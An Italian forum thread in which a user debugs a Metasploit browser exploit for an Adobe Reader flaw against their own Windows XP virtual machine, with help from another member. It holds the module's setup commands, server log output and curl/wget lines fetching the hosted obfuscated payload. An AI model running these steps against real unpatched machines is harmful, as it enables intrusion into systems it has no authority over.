Domanda Malfunzionamento di metasploit o scorretto utilizzo? Adobe Reader ToolButton

Stato
Discussione chiusa ad ulteriori risposte.

inforge-user001

Utente Jade
28 Marzo 2020
556
61
2,278
732
Salve a tutte e tutti, sto provando a simulare un attacco facendo leva sulla vulnerabilità nota Adobe Reader ToolButton [1] tramite metasploit.
Utilizzo una macchina virtuale con Windows XP SP3 e Adobe Reader 9.0.
Questi sono i comandi che eseguo dopo aver lanciato metasploit:
Codice:
use exploit/windows/browser/adobe_toolbutton
set TARGET 0
set LHOST <mio_ip_locale>
set SRVHOST <mio_ip_locale>
exploit

viene generato un link tipo http://<mio_ip_locale>:8080/e48Ef1eqM al quale clicco tramite Internet Explorer sulla macchina virtuale.

Reazione VM:
- Apertura di un documento PDF vuoto

Reazione metasploit:
Codice:
[*] <mio_ip_locale>   adobe_toolbutton - Sending HTML response to <mio_ip_locale>
[*] <mio_ip_locale>   adobe_toolbutton - request: /e48Ef1eqM/MYmLAV/
[*] <mio_ip_locale>   adobe_toolbutton - Sending PDF...


Mantenendo una riga vuota, come se effettivamente avessi una shell aperta ma se provo a scrivere un comando tipo dir l'output che viene mostrato è relativo alla mia macchina e non alla VM e dopo mi esce di nuovo la scritta msf6 exploit(windows/browser/adobe_toolbutton) > come se avesse chiuso la shell creata e per tornare a quella situazione devo ricaricare il link http://<mio_ip_locale>:8080/e48Ef1eqM dalla VM.

[1] https://www.rapid7.com/db/modules/exploit/windows/browser/adobe_toolbutton/
 
Ultima modifica:
Quindi se vuoi testarlo in quel modo installa Adobe Reader 11.0.2
Grazie per aver risposto, provando a farlo funzionare su Adobe Reader 11.0.2 mi da come errore XMLHttpRequest non definito, hai idea di cosa potrebbe essere?
Firewall, Aggiornamenti automatici e Protezione da virus sono disabilitati.
1668585613457.png

Messaggio unito automaticamente:

Notavo inoltre che nelle impostazioni avanzate dell'exploit risultano alcune impostazioni settate a false nonostante ci sia scritto yes sotto la colonna Required, questa cosa potrebbe incidere?

1668587532238.png
 
Sembra essere un problema dell'exploit (quello che viene hostato e poi aperto dal browser). E' abbastanza complesso da debuggare poichè è tutto offuscato, puoi dargli un occhi tu stesso scaricando direttamente il sorgente hostato: $ wget http://192.168.1.80:8080/f1sRWSzBQLR

Sto cercando in giro per capire se si tratti di un problema noto
 
  • Grazie
Reazioni: inforge-user001
Ho esportato il documento tramite
Codice:
$ curl http://192.168.50.149:8080/oItIr8eEge99SR --output asd.pdf
e l'ho passato alla VM ma mi dava errore perché risultava "incompleto".
Ho modificato il nome da asd.pdf ad asd.txt e ho riprovato a passarlo, ora me l'ha fatto fare.
Ho rinominato nella VM il nome da asd.txt ad asd.pdf e provando ad aprirlo sia con Adobe Reader 11.0.2 che con Internet Explorer mi da errore nell'elaborazione del documento.

1668589924103.png


PS: Nella console di metasploit non è avvenuto nulla aprendo il file in locale
 
  • Mi piace
Reazioni: 0xbro
Ho esportato il documento tramite
Codice:
$ curl http://192.168.50.149:8080/oItIr8eEge99SR --output asd.pdf
e l'ho passato alla VM ma mi dava errore perché risultava "incompleto".
Ho modificato il nome da asd.pdf ad asd.txt e ho riprovato a passarlo, ora me l'ha fatto fare.
Ho rinominato nella VM il nome da asd.txt ad asd.pdf e provando ad aprirlo sia con Adobe Reader 11.0.2 che con Internet Explorer mi da errore nell'elaborazione del documento.

Visualizza allegato 66465

PS: Nella console di metasploit non è avvenuto nulla aprendo il file in locale
Sì quello è normale, il file è un file HTML che si occupa di comunicare con la C&C (metasploit) e scaricare successivamente il PDF.
1668590837263.png

1668591087771.png

Al momento non ho un ambiente con un Adbobe vecchio però, quindi non riesco a fare test dinamici.. stavo provando ad analizzare solo il codice ma è un po' complicato ahah
 
  • Grazie
Reazioni: inforge-user001
Stato
Discussione chiusa ad ulteriori risposte.